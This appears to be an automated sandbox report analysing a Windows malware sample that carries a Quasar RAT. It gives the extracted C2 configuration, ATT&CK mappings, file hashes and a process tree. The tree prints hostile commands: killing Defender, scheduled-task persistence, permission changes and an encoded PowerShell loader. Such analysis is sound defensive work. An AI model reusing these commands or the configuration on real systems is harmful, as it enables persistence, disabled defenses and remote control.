Overview

overview

10

Static

static

10

lol.exe

windows10-1703-x64

10

Analysis

  • max time kernel
    1199s
  • max time network
    1198s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23-05-2024 15:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lol.exe

  • Size

    13.1MB

  • MD5

    621d4a616715d165ed2c10e48e5fd94b

  • SHA1

    7fabfdb5167e59d0442df460e1b236cb5bc75fbe

  • SHA256

    7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde

  • SHA512

    793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442

  • SSDEEP

    196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s

Score
10/10
quasarromkadiscoveryevasionexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 2 IoCs
  • Windows security bypass 2 TTPs 5 IoCs
    evasiontrojan
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • .NET Reactor proctector 18 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 6 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • AutoIT Executable 9 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 15 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 15 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\lol.exe
    "C:\Users\Admin\AppData\Local\Temp\lol.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4268
    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\loader.exe
      "C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\loader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\temp.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K main.cmd
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:204
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im WindowsDefender.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3264
          • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\Rover.exe
            Rover.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1944
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\helper.vbs"
            5⤵
              PID:3396
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\spinner.gif
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1060
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:82945 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:3052
            • C:\Windows\system32\timeout.exe
              timeout /t 15
              5⤵
              • Delays execution with timeout.exe
              PID:4376
            • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\scary.exe
              scary.exe
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3456
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                6⤵
                • Creates scheduled task(s)
                PID:3596
              • C:\Program Files\SubDir\Romilyaa.exe
                "C:\Program Files\SubDir\Romilyaa.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1004
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                  7⤵
                  • Creates scheduled task(s)
                  PID:3124
            • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\the.exe
              the.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1000
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2756
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im taskmgr
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1104
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im explorer
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1464
            • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\ac3.exe
              ac3.exe
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: GetForegroundWindowSpam
              PID:3636
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im fontdrvhost
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4788
            • C:\Windows\system32\icacls.exe
              icacls c:\Windows\explorer.exe /grant Admin:(F,M)
              5⤵
              • Modifies file permissions
              PID:504
            • C:\Windows\system32\timeout.exe
              timeout /t 15
              5⤵
              • Delays execution with timeout.exe
              PID:2256
            • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\jaffa.exe
              jaffa.exe
              5⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3124
              • C:\Windows\SysWOW64\rmmyznpyzi.exe
                rmmyznpyzi.exe
                6⤵
                • Modifies visibility of file extensions in Explorer
                • Modifies visiblity of hidden/system files in Explorer
                • Windows security bypass
                • Disables RegEdit via registry modification
                • Executes dropped EXE
                • Windows security modification
                • Enumerates connected drives
                • Modifies WinLogon
                • Drops file in System32 directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1832
                • C:\Windows\SysWOW64\eydtvbel.exe
                  C:\Windows\system32\eydtvbel.exe
                  7⤵
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Drops file in System32 directory
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:5316
              • C:\Windows\SysWOW64\xqhojspucludpui.exe
                xqhojspucludpui.exe
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1500
              • C:\Windows\SysWOW64\eydtvbel.exe
                eydtvbel.exe
                6⤵
                • Executes dropped EXE
                • Enumerates connected drives
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:5144
              • C:\Windows\SysWOW64\qkeukaslqxoij.exe
                qkeukaslqxoij.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:5168
              • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                6⤵
                • Drops file in Windows directory
                • Checks processor information in registry
                • Enumerates system info in registry
                • Suspicious behavior: AddClipboardFormatListener
                • Suspicious use of SetWindowsHookEx
                PID:5304
            • C:\Windows\system32\timeout.exe
              timeout /t 15
              5⤵
              • Delays execution with timeout.exe
              PID:2332
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1868
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      PID:424
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4156
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1396
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:3288
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:4952
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:5732

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Winlogon Helper DLL

    1
    T1547.004

    Scheduled Task/Job

    1
    T1053

    Privilege Escalation

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Winlogon Helper DLL

    1
    T1547.004

    Scheduled Task/Job

    1
    T1053

    Defense Evasion

    File and Directory Permissions Modification

    1
    T1222

    Hide Artifacts

    2
    T1564

    Hidden Files and Directories

    2
    T1564.001

    Impair Defenses

    2
    T1562

    Disable or Modify Tools

    2
    T1562.001

    Modify Registry

    7
    T1112

    Credential Access

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Peripheral Device Discovery

    1
    T1120

    Query Registry

    5
    T1012

    System Information Discovery

    5
    T1082

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe
      Filesize

      512KB

      MD5

      21bdde196bb244b879aa424b7a1c9294

      SHA1

      ad275d2854c820209f491a9f4504f150c020ac9b

      SHA256

      4136e10b7a68d3d8c3e898eb2a5b8fb973d1c51f48ffc750b362ce8f1f5fbb36

      SHA512

      542d54dc9c66308c3e66e616cf9ad13ca37f19a7159c97f1e3e44765c90a5ed8a2965b073da54173e419ea61792e54e80cd3b914b0f00812f1b42780084705e2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VSH5XF98\edgecompatviewlist[1].xml
      Filesize

      74KB

      MD5

      d4fc49dc14f63895d997fa4940f24378

      SHA1

      3efb1437a7c5e46034147cbbc8db017c69d02c31

      SHA256

      853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

      SHA512

      cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TCD7FD3.tmp\gb.xsl
      Filesize

      262KB

      MD5

      51d32ee5bc7ab811041f799652d26e04

      SHA1

      412193006aa3ef19e0a57e16acf86b830993024a

      SHA256

      6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

      SHA512

      5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cteimjck.rgj.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Filesize

      243B

      MD5

      fc3c3eb301931edc101755bdbd07832e

      SHA1

      7de988750dc0c87064dfb06409a8963aa960f30c

      SHA256

      7659d0f61d6acf42bf9265037ee127e8a1baede4912244bdfefdd3adb2191894

      SHA512

      481006f15b1af0efeaf3820ab2c87cd4777749f3df91a5bac94c8f7606b2b0904a9e7b71ec371e24614b46eca84f9ed8a0863aa73411e2fba7667759a258c24d

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U50EZB0S72G9BAP86AM2.temp
      Filesize

      3KB

      MD5

      8e9803968726f83de1fe993a5796eb62

      SHA1

      f0eacd587461c408fb96dd8b319c51fd72717fac

      SHA256

      9285fac039479d26edbb2feec862bccde64570d29976160e12d59514af15f866

      SHA512

      368c847330a97f78b7ecda1c59243c56a637bec00b2b7ff7f2dd89f354b6d967f0a593fd4b8ff3928da7d2467e475cbee62ff2d01b47a63e07f8147d790e76ff

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
      Filesize

      3KB

      MD5

      602d146062bd207187dab7af526871de

      SHA1

      56ac515432496ddaa939e74ea7834f134cf07f08

      SHA256

      47d4a523ccb4cf63e3ae13c3b1517a0c72d7054bf5cc14a08bfdf5e3a9528f61

      SHA512

      7dbd9f37abf2e8b48a5909aa51f697d130dc7ad792821e76250be4b91f0cf5ea588d73514f4dcacb2cb43d4eadce9e22965d1bcf2ce5a5f6366e6f5c097fd990

      Download Submit

    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\Rover.exe
      Filesize

      5.1MB

      MD5

      63d052b547c66ac7678685d9f3308884

      SHA1

      a6e42e6a86e3ff9fec137c52b1086ee140a7b242

      SHA256

      8634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba

      SHA512

      565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642

      Download Submit

    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\ac3.exe
      Filesize

      844KB

      MD5

      7ecfc8cd7455dd9998f7dad88f2a8a9d

      SHA1

      1751d9389adb1e7187afa4938a3559e58739dce6

      SHA256

      2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e

      SHA512

      cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d

      Download Submit

    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\helper.vbs
      Filesize

      26B

      MD5

      7a97744bc621cf22890e2aebd10fd5c8

      SHA1

      1147c8df448fe73da6aa6c396c5c53457df87620

      SHA256

      153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709

      SHA512

      89c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967

      Download Submit

    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\jaffa.exe
      Filesize

      512KB

      MD5

      6b1b6c081780047b333e1e9fb8e473b6

      SHA1

      8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de

      SHA256

      e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac

      SHA512

      022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

      Download Submit

    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\loader.exe
      Filesize

      5KB

      MD5

      3a66b8c04d1437b4c4da631053a76bb5

      SHA1

      bcf8f381932d376f3f8e53c82b2b13ff31ee097b

      SHA256

      c3aa0c8ff9e3c7e10bcd3829f3e63b4cf9c59eb4964a7576f3ef5fca50c77cdc

      SHA512

      b24f3fb34aa293293d4f7bef247ca746608cb9ae54d214492276e7ef0fe0032944ea082f2bbf42f200359d38ed2af69f51ef5f3cb969a0ffb7176b27e0279fcf

      Download Submit

    • C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\main.cmd
      Filesize

      867B

      MD5

      4eab82459d6247d5cb735bc6883a0b1f

      SHA1

      d4e1ee562a1594b0f6a01134d9acdb36021bf8f8

      SHA256

      4545d060ce8984205a5e1a136a523cb34c7a5df5427aeabc94bc2693b8773b2f

